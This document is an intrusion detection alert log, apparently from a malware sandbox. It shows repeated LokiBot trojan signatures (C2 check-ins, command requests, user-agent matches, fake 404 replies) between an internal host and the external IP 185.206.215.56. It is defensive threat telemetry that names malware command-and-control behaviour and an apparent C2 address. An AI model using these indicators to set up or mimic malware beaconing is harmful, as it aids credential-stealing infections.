01/05/21-19:06:11.871413 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49178 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:12.075634 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49179 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.075634 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49179 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.075634 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49179 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.075634 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49179 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.243051 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49179 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:12.449877 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49180 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.449877 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49180 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.449877 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49180 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.449877 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49180 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.609106 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49180 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:12.832799 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49181 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.832799 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49181 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.832799 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49181 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.832799 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49181 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.987731 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49181 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:13.213064 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49182 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.213064 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49182 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.213064 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49182 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.213064 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49182 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.388159 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49182 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:13.606387 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49183 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.606387 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49183 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.606387 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49183 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.606387 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49183 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.778989 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49183 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:14.002546 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49184 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.002546 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49184 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.002546 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49184 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.002546 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49184 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.168912 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49184 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:14.391399 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49185 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.391399 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49185 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.391399 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49185 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.391399 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49185 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.558086 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49185 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:14.788464 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49186 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.788464 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49186 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.788464 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49186 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.788464 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49186 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.954180 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49186 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:15.165872 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49187 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.165872 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49187 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.165872 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49187 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.165872 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49187 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.352806 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49187 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:15.552401 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49188 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.552401 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49188 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.552401 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49188 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.552401 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49188 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.734059 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49188 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:15.960354 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49189 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.960354 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49189 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.960354 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49189 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.960354 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49189 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.139385 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49189 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:16.358508 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49190 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.358508 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49190 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.358508 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49190 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.358508 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49190 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.531882 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49190 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:16.795879 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49191 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.795879 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49191 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.795879 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49191 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.795879 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49191 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.967213 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49191 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:17.183871 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49192 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.183871 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49192 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.183871 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49192 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.183871 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49192 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.344388 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49192 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:17.566777 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49193 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.566777 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49193 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.566777 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49193 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.566777 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49193 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.726876 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49193 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:17.949146 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49194 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.949146 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49194 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.949146 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49194 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:17.949146 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49194 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.134410 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49194 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:18.364453 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49195 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.364453 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49195 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.364453 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49195 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.364453 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49195 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.531194 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49195 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:18.788238 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49196 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.788238 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49196 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.788238 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49196 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.788238 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49196 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:18.959883 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49196 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:40.714092 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49251 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:40.893523 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49251 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:41.109834 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49252 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.109834 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49252 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.109834 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49252 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.109834 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49252 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.281018 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49252 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:41.488492 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49253 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.488492 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49253 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.488492 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49253 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.488492 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49253 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.665959 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49253 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:41.875312 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49254 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.875312 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49254 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.875312 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49254 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:41.875312 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49254 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.043815 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49254 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:42.266645 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49255 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.266645 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49255 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.266645 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49255 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.266645 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49255 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.432654 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49255 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:42.638995 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49256 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.638995 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49256 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.638995 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49256 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.638995 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49256 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:42.805691 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49256 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:43.011253 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49257 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.011253 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49257 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.011253 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49257 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.011253 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49257 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.168522 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49257 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:43.372296 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49258 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.372296 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49258 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.372296 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49258 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.372296 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49258 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.526493 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49258 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:43.756835 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49259 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.756835 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49259 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.756835 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49259 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.756835 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49259 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:43.913405 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49259 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:44.120266 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49260 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.120266 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49260 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.120266 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49260 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.120266 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49260 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.276026 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49260 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:44.485788 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49261 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.485788 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49261 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.485788 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49261 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.485788 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49261 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.652260 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49261 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:44.876902 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49262 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.876902 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49262 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.876902 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49262 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:44.876902 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49262 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.053688 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49262 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:45.261637 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49263 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.261637 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49263 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.261637 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49263 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.261637 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49263 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.422623 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49263 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:45.633934 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49264 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.633934 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49264 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.633934 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49264 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.633934 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49264 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.789961 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49264 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:45.996354 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49265 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.996354 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49265 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.996354 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49265 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.996354 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49265 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.162508 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49265 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:46.366773 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49266 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.366773 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49266 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.366773 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49266 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.366773 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49266 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.523351 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49266 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:46.730742 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49267 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.730742 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49267 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.730742 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49267 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.730742 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49267 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.897287 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49267 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:47.102635 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49268 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.102635 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49268 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.102635 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49268 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.102635 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49268 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.257102 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49268 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:47.475682 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49269 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.475682 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49269 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.475682 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49269 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.475682 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49269 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.647987 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49269 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:47.867741 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49270 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.867741 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49270 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.867741 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49270 | 80 | 192.168.2.22 | 185.206.215.56 |
